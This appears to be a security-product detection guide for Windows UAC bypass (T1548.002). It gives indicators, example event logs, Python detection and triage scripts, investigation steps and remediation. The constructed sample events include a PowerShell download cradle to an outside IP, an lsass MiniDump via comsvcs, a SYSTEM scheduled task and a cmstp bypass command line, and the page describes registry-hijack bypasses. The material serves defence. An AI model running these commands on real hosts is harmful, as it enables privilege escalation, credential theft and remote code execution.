EventPeeker

UAC Bypass Detection — Privilege Escalation Without a Prompt

UAC bypass techniques allow attackers to silently elevate a process from a standard or medium-integrity context to high integrity (administrator) without triggering the User Account Control consent prompt. Dozens of techniques exist using built-in Windows binaries, COM object abuse, and registry hijacking — most require no additional tools beyond living-off-the-land binaries.

Severity

High

ATT&CK Tactic

Privilege Escalation

Common attacker usage

  • Silently escalate from a medium-integrity shell to a high-integrity (admin) process without user interaction
  • Registry hijack via HKCU\Software\Classes to redirect auto-elevate binaries (fodhelper, eventvwr, sdclt)
  • COM object abuse to invoke the ICMLuaUtil or IColorDataProxy elevation interfaces
  • DiskCleanup scheduled task hijack: the SilentCleanup task is configured to run with highest privileges in the logged-on user's context, so the cleanmgr.exe it launches runs at high integrity without a UAC prompt

Investigate immediately if

  • fodhelper.exe, eventvwr.exe, sdclt.exe, or cmstp.exe spawns an unexpected child process (cmd.exe, powershell.exe, or a suspicious binary)
  • A registry write to HKCU\Software\Classes\ms-settings or HKCU\Software\Classes\mscfile (Event ID 4657, or Sysmon Event ID 13 where no registry SACL is configured) immediately precedes execution of an auto-elevate binary
  • A process running at medium integrity spawns a child at high integrity with no consent.exe process creation in between, i.e. no UAC prompt was shown
  • Event ID 4104 shows PowerShell creating or modifying HKCU registry keys for shell\open\command entries

MITRE ATT&CK

Technique

T1548.002 · Bypass User Account Control

Tactic

Privilege Escalation


Security Relevance

UAC separates medium-integrity (standard user) execution from high-integrity (admin) execution for accounts in the local Administrators group, but Microsoft does not treat it as a security boundary, which is why most bypass techniques are never serviced as vulnerabilities and keep working across builds. Bypassing it silently lets an attacker escalate without alerting the user or supplying credentials, turning a limited foothold into full administrator access. A UAC bypass is almost always followed immediately by credential dumping, persistence installation, or lateral movement, so detecting the bypass itself is a critical early-warning signal. Most techniques abuse built-in 'auto-elevate' Windows binaries that Windows trusts to run at high integrity without a prompt.

Indicators of Malicious Use

  • fodhelper.exe, eventvwr.exe, sdclt.exe, cmstp.exe, or cleanmgr.exe (the binary launched by the DiskCleanup\SilentCleanup scheduled task) spawning cmd.exe, powershell.exe, or any child outside its expected set; apart from a few known pairs such as eventvwr.exe launching mmc.exe, these binaries should never spawn shells or script hosts
  • Event ID 4657 (registry value set) in HKCU\Software\Classes\ms-settings\shell\open\command or HKCU\Software\Classes\mscfile\shell\open\command immediately before an auto-elevate binary runs; 4657 is only generated when a SACL covers the key, so in most environments Sysmon Event ID 13 is where this write actually appears
  • Event ID 4688 with Token Elevation Type %%1937 (TokenElevationTypeFull) whose creator process ran at medium integrity, with no consent.exe process creation in between; 4688 does not record the parent's integrity level, so confirm it with Sysmon Event ID 1 (IntegrityLevel) or EDR telemetry
  • Event ID 4104 containing Set-ItemProperty or New-Item commands targeting HKCU\Software\Classes registry paths
  • cmstp.exe launched with /ni /s flags and an INF file path — classic cmstp UAC bypass signature
  • Process creation showing wscript.exe or mshta.exe as parent of an elevated shell — indicates script-based COM elevation

Example Log Entry

Event ID: 4688 — Process Creation
Creator Process: C:\Windows\System32\fodhelper.exe
New Process:     C:\Windows\System32\cmd.exe          ← unexpected child of fodhelper
Token Elevation: %%1937 TokenElevationTypeFull (2)      ← high integrity, no UAC prompt shown
Command Line:    cmd.exe /c powershell -nop -w hidden -enc <base64>
Logon ID:        0x<user logon ID>                       ← the compromised user's elevated logon session; 0x3E7 here would mean SYSTEM, not a UAC bypass

Prior Event ID 4657 (2 seconds earlier):
Object Name:     \REGISTRY\USER\S-1-5-21-...\Software\Classes\ms-settings\shell\open\command
Operation:       %%1904 (New registry value created)
Process Name:    powershell.exe
New Value:       cmd.exe /c powershell -nop -w hidden -enc <base64>
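The indicators above and the 4657/4688 pair in the example log can be expressed as a correlation over the parsed events. The following is an added example written for this guide, not EventPeeker's own detection code: the events are constructed to mimic 4688 and 4657 with shortened field names, cleanmgr.exe stands in for the DiskCleanup task, and the Folder\shell\open\command key (used by the sdclt.exe bypass) is an addition not listed on this page.

```python
"""Correlate Windows Security events for the UAC bypass indicators above.

Added example for this guide, not EventPeeker's own detection code. The
event dicts are constructed to mimic Security events 4688 (process
creation) and 4657 (registry value set) with shortened field names; none
of it is real log data.
"""
from datetime import datetime, timedelta

# Auto-elevate binaries named on this page; cleanmgr.exe is what the
# DiskCleanup\SilentCleanup scheduled task launches.
AUTO_ELEVATE = {"fodhelper.exe", "eventvwr.exe", "sdclt.exe", "cmstp.exe", "cleanmgr.exe"}
SHELLS = {"cmd.exe", "powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe",
          "mshta.exe", "rundll32.exe", "regsvr32.exe"}
# Known-good parent/child pairs that must not fire (eventvwr.exe hosts its
# console in mmc.exe).
EXPECTED_CHILDREN = {("eventvwr.exe", "mmc.exe")}
# shell\open\command subkeys hijacked by the bypasses on this page. The Folder
# key (used by the sdclt.exe bypass) is an addition of this example.
HIJACK_KEYS = (r"\software\classes\ms-settings\shell\open\command",
               r"\software\classes\mscfile\shell\open\command",
               r"\software\classes\folder\shell\open\command")
TOKEN_FULL = "%%1937"  # 4688 Token Elevation Type: TokenElevationTypeFull (2)


def basename(path):
    return path.rsplit("\\", 1)[-1].lower()


def detect(events, window=timedelta(seconds=60)):
    """Return one finding per suspicious 4688 with every reason that matched."""
    events = sorted(events, key=lambda e: e["TimeCreated"])
    hijacks = [e for e in events
               if e["EventID"] == 4657 and e["ObjectName"].lower().endswith(HIJACK_KEYS)]
    findings = []
    for e in events:
        if e["EventID"] != 4688:
            continue
        parent, child = basename(e["CreatorProcessName"]), basename(e["NewProcessName"])
        tokens = e["CommandLine"].lower().split()
        reasons = []
        if parent in AUTO_ELEVATE and (parent, child) not in EXPECTED_CHILDREN:
            kind = "shell or script host" if child in SHELLS else "unexpected child"
            reasons.append(f"auto-elevate binary {parent} spawned {kind} {child}")
            if e["TokenElevationType"] == TOKEN_FULL:
                reasons.append("child holds a full (high-integrity) token")
            for h in hijacks:  # registry hijack written shortly before the spawn
                delta = e["TimeCreated"] - h["TimeCreated"]
                if timedelta(0) <= delta <= window:
                    reasons.append(f"{basename(h['ProcessName'])} wrote {h['ObjectName']} "
                                   f"{delta.total_seconds():.0f}s earlier")
        if (child == "cmstp.exe" and "/ni" in tokens and "/s" in tokens
                and any(t.endswith(".inf") for t in tokens)):
            reasons.append("cmstp.exe /ni /s <inf> bypass signature")
        if reasons:
            findings.append({"time": e["TimeCreated"], "parent": parent, "child": child,
                             "command": e["CommandLine"], "reasons": reasons})
    return findings


# --- constructed sample events (not real log data) ----------------------
T0 = datetime(2024, 5, 1, 9, 30, 0)
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
KEY = (r"\REGISTRY\USER\S-1-5-21-3623811015-3361044348-30300820-1013"
       r"\Software\Classes\ms-settings\shell\open\command")


def proc(sec, creator, new, cmd, token):
    return {"EventID": 4688, "TimeCreated": T0 + timedelta(seconds=sec),
            "CreatorProcessName": creator, "NewProcessName": new,
            "CommandLine": cmd, "TokenElevationType": token}


SAMPLE_EVENTS = [
    proc(0, r"C:\Windows\explorer.exe", PS, "powershell.exe", "%%1938"),  # medium integrity
    {"EventID": 4657, "TimeCreated": T0 + timedelta(seconds=5), "ProcessName": PS,
     "ObjectName": KEY, "NewValue": "cmd.exe /c powershell -nop -w hidden -enc <base64>"},
    proc(6, PS, r"C:\Windows\System32\fodhelper.exe", "fodhelper.exe", "%%1937"),
    proc(7, r"C:\Windows\System32\fodhelper.exe", r"C:\Windows\System32\cmd.exe",
         "cmd.exe /c powershell -nop -w hidden -enc <base64>", "%%1937"),
    proc(120, r"C:\Windows\System32\eventvwr.exe", r"C:\Windows\System32\mmc.exe",
         "mmc.exe eventvwr.msc", "%%1937"),  # benign: expected child
    proc(300, r"C:\Windows\explorer.exe", r"C:\Windows\System32\cmstp.exe",
         r"cmstp.exe /ni /s C:\Users\Public\x.inf", "%%1938"),
]

if __name__ == "__main__":
    for f in detect(SAMPLE_EVENTS):
        print(f["time"], f["parent"], "->", f["child"])
        for r in f["reasons"]:
            print("   ", r)
```

Run against the sample, the fodhelper.exe to cmd.exe event fires with all three reasons (unexpected shell child, full token, hijack write two seconds earlier) while the benign eventvwr.exe to mmc.exe pair stays quiet; the cmstp.exe event fires on its command line alone, since that bypass needs no registry write. To use real data, map the EVTX fields (Creator Process Name, New Process Name, Process Command Line, Token Elevation Type, Object Name) onto these keys and widen EXPECTED_CHILDREN with whatever your baseline shows.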

Investigation Steps

  1. Identify the auto-elevate binary involved (fodhelper, eventvwr, sdclt, cmstp, or cleanmgr launched by the DiskCleanup scheduled task). Search Event ID 4688 for that binary and its child processes; the child is what the attacker wanted to run elevated.
  2. Check Event ID 4657 (or Sysmon Event ID 13) for registry writes to HKCU\Software\Classes in the 60 seconds before the bypass binary ran. The written value is the attacker's payload command.
  3. Examine the child process command line for secondary payloads: encoded PowerShell, downloads, credential dumping commands, or network connections.
  4. Check Event ID 4624 for the session context: identify the original user account and how the initial foothold was obtained (phishing, lateral movement, etc.).
  5. Search Event ID 4688 for the processes the elevated shell spawned next. UAC bypass is almost always immediately followed by another action (credential dumping, persistence, lateral movement).
  6. Review Event ID 4104 (PowerShell script block) around the same timeframe for the registry manipulation script. Invoke-Expression, Set-ItemProperty, and New-ItemProperty targeting HKCU\Software\Classes are common patterns.
  7. Clean up: export the malicious HKCU\Software\Classes keys for evidence, then delete them, terminate the elevated process, and contain the host. Then trace back to determine the initial access vector.
  8. Determine scope: if the attacker achieved high integrity, assume credential dumping is imminent or already occurred. Check for handles opened to lsass.exe (Sysmon Event ID 10, or Event ID 4663 where kernel object auditing is enabled) and initiate credential rotation for accounts that had sessions on the host.
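Steps 2, 3, 5, 7 and 8 above amount to one triage pass over the process tree rooted at the elevated shell. The following is an added example for this guide, not EventPeeker's code: it decodes `-enc` PowerShell, walks the 4688 creator chain, tags follow-on activity with a small keyword map that is an assumption for the example and far from complete, and lists the hijack keys to export and delete. The events, SID, logon ID and process IDs are constructed.

```python
"""Triage a confirmed UAC bypass: follow what the elevated shell ran next,
decode encoded PowerShell, and list the hijack keys to remove.

Added example for this guide, not EventPeeker's code. The events below are
constructed to look like Security events 4688 and 4657 (field names
shortened) and are not real log data.
"""
import base64
import re
from datetime import datetime, timedelta

# Follow-on behaviours to flag in descendants' command lines (steps 5 and 8).
# This keyword map is an assumption for the example and is far from complete.
FOLLOW_ON = {
    "credential dumping": ("lsass", "sekurlsa", "procdump", "mimikatz", "comsvcs", "reg save"),
    "persistence": ("schtasks /create", "sc create", r"\currentversion\run", "net user"),
    "lateral movement": ("psexec", "wmic /node", "invoke-command", "winrs"),
}


def basename(path):
    return path.rsplit("\\", 1)[-1].lower()


def decode_encoded_command(cmdline):
    """Return the script behind a PowerShell -e/-enc/-EncodedCommand argument
    (base64 of UTF-16LE text), or None when the command line has none."""
    m = re.search(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", cmdline, re.I)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def descendants(events, root_pid):
    """Breadth-first walk of 4688 events whose creator chain leads back to
    root_pid. Windows reuses PIDs, so on real data also bound the walk by
    time; the constructed sample uses unique PIDs."""
    procs = sorted((e for e in events if e["EventID"] == 4688), key=lambda e: e["TimeCreated"])
    out, frontier = [], [root_pid]
    while frontier:
        pid = frontier.pop(0)
        for e in procs:
            if e["CreatorProcessId"] == pid and e not in out:
                out.append(e)
                frontier.append(e["NewProcessId"])
    return out


def classify(cmdline):
    """Tag a command line (and its decoded -enc payload) with FOLLOW_ON labels."""
    text = cmdline.lower()
    decoded = decode_encoded_command(cmdline)
    if decoded:
        text += " " + decoded.lower()
    return [label for label, needles in FOLLOW_ON.items() if any(n in text for n in needles)]


def triage(events, bypass_event, lookback=timedelta(seconds=60)):
    """Summarise one flagged 4688 (auto-elevate binary -> shell): the hijack
    keys written just before it, everything the shell then ran, and whether
    credential material should be treated as exposed."""
    t = bypass_event["TimeCreated"]
    keys = sorted({e["ObjectName"] for e in events if e["EventID"] == 4657
                   and t - lookback <= e["TimeCreated"] <= t
                   and e["ObjectName"].lower().endswith(r"\shell\open\command")})
    actions = []
    for e in [bypass_event] + descendants(events, bypass_event["NewProcessId"]):
        actions.append({"time": e["TimeCreated"], "process": basename(e["NewProcessName"]),
                        "command": e["CommandLine"],
                        "decoded": decode_encoded_command(e["CommandLine"]),
                        "tags": classify(e["CommandLine"])})
    return {"logon_id": bypass_event["SubjectLogonId"],
            "hijack_keys_to_remove": keys,
            "actions": actions,
            "credential_exposure": any("credential dumping" in a["tags"] for a in actions)}


# --- constructed sample (not real log data) ------------------------------
STAGER = "IEX (New-Object Net.WebClient).DownloadString('http://198.51.100.7/a.ps1')"
ENC = base64.b64encode(STAGER.encode("utf-16-le")).decode()
T0 = datetime(2024, 5, 1, 9, 30, 0)
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
KEY = (r"\REGISTRY\USER\S-1-5-21-3623811015-3361044348-30300820-1013"
       r"\Software\Classes\ms-settings\shell\open\command")


def proc_event(sec, creator, creator_pid, new, new_pid, cmd):
    return {"EventID": 4688, "TimeCreated": T0 + timedelta(seconds=sec),
            "CreatorProcessName": creator, "CreatorProcessId": creator_pid,
            "NewProcessName": new, "NewProcessId": new_pid, "CommandLine": cmd,
            "SubjectLogonId": "0x4e1a2"}


SAMPLE_EVENTS = [
    {"EventID": 4657, "TimeCreated": T0, "ProcessName": PS, "ObjectName": KEY},
    proc_event(2, r"C:\Windows\System32\fodhelper.exe", 4000, r"C:\Windows\System32\cmd.exe",
               4100, f"cmd.exe /c powershell -nop -w hidden -enc {ENC}"),
    proc_event(3, r"C:\Windows\System32\cmd.exe", 4100, PS, 4200,
               f"powershell -nop -w hidden -enc {ENC}"),
    proc_event(20, PS, 4200, r"C:\Windows\System32\rundll32.exe", 4300,
               r"rundll32.exe C:\Windows\System32\comsvcs.dll, MiniDump 656 C:\Windows\Temp\l.dmp full"),
    proc_event(25, PS, 4200, r"C:\Windows\System32\schtasks.exe", 4400,
               r"schtasks /create /tn Updater /tr C:\ProgramData\u.exe /sc onlogon /ru SYSTEM"),
    proc_event(40, r"C:\Windows\explorer.exe", 1000, r"C:\Windows\System32\notepad.exe",
               5000, "notepad.exe"),  # unrelated user activity, not in the chain
]
BYPASS_EVENT = SAMPLE_EVENTS[1]

if __name__ == "__main__":
    import pprint
    pprint.pprint(triage(SAMPLE_EVENTS, BYPASS_EVENT))
```

On the sample the report lists the ms-settings hijack key to remove, walks cmd.exe to powershell.exe to the rundll32.exe comsvcs MiniDump and schtasks persistence, shows the decoded download cradle, and sets credential_exposure, which is the signal for step 8's credential rotation. The keyword tags are a starting point for the analyst, not a verdict; anything the walk surfaces still needs to be read.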


Common False Positives

  • Some legitimate software (notably older installers and system utilities) uses auto-elevate binaries during setup. Correlate with known software deployment windows and check the child process signature.
  • fodhelper.exe has a legitimate role in Windows Settings (it is the Features on Demand helper) and may occasionally spawn system processes. The key indicator is an unexpected or unsigned child process, especially with an encoded or obfuscated command line.
  • Red team tools (Cobalt Strike, Metasploit) and penetration testing frameworks commonly test UAC bypass; coordinate with your security team before escalating detections during authorized engagements.
  • Is UAC bypass the same as privilege escalation? Not exactly. A UAC bypass elevates within an already-compromised account's context (medium to high integrity) and does not by itself grant another account's rights; a true privilege escalation exploits a vulnerability to gain SYSTEM or a different user's rights from a non-admin context. In practice the distinction is thin, because a high-integrity administrator can obtain SYSTEM trivially (for example by creating a service), which is why the severity here is High.

Remediation

  • Set UAC to 'Always notify' (the highest setting) in Group Policy — this forces a prompt even for auto-elevate binaries and eliminates most registry hijack bypasses.
  • Enable Windows Defender Attack Surface Reduction (ASR) rules that cut off the usual initial foothold, such as blocking Office applications from creating child processes and blocking execution of potentially obfuscated scripts. No ASR rule blocks auto-elevation itself, so treat ASR as a complement to the UAC level and allowlisting controls in this list, not a substitute.
  • Monitor HKCU\Software\Classes registry writes via audit policy (Object Access → Registry) or Sysmon EventID 13 (RegistryEvent). Alert on any write to shell\open\command subkeys.
  • Deploy application allowlisting (Windows Defender Application Control or AppLocker) so the attacker's payload cannot execute at any integrity level. AppLocker's default rules allow members of the local Administrators group to run anything, and the hijacked child carries that group enabled in its high-integrity token, so write explicit publisher or path rules rather than relying on the defaults.
  • Ensure standard users are not members of the local Administrators group — UAC bypass only works if the current user is in the Administrators group. Least-privilege enforcement removes the precondition.

Related Event IDs

4688 · Process creation — identify the auto-elevate binary and its unexpected child
4657 · Registry value set — HKCU\Software\Classes hijack writes appear here immediately before the bypass
4104 · PowerShell script block — registry manipulation commands captured here
4624 · Successful logon — establish the session context before escalation

Frequently Asked Questions

Does UAC bypass work on all Windows versions?
Individual bypass techniques are build-specific. Because Microsoft does not treat UAC as a security boundary, bypasses are fixed opportunistically in new Windows builds rather than through security updates, and new methods are continuously discovered; the underlying attack surface (auto-elevate binaries, COM elevation, scheduled tasks) exists in all supported Windows versions. The fodhelper bypass still works on Windows 10 and 11 at the default UAC level. Techniques that work on one build may be fixed in the next, so attackers typically probe multiple methods.
Why doesn't antivirus reliably detect UAC bypass?
UAC bypass techniques primarily use signed, legitimate Windows binaries (fodhelper.exe, eventvwr.exe) as the elevation vehicle — AV cannot block these. The malicious component is a registry key write to HKCU, which is a normal operation. Only the combination of the registry write + auto-elevate binary spawn + unexpected child process reveals the attack. Behavioral detection (EDR) is far more effective than signature-based AV for this technique.
Is UAC bypass possible on standard user accounts?
No. UAC bypass techniques require the current user to be a member of the local Administrators group. Standard users (non-administrators) cannot elevate via UAC bypass — they would need a true privilege escalation vulnerability. This is why enforcing least privilege (standard user accounts for daily work) is the most effective defense: it eliminates the precondition for UAC bypass entirely.

Analyze your Windows Event Logs

Upload an .evtx file from servers, domain controllers, or endpoints — get instant detections, MITRE mappings, and an AI-generated triage report.
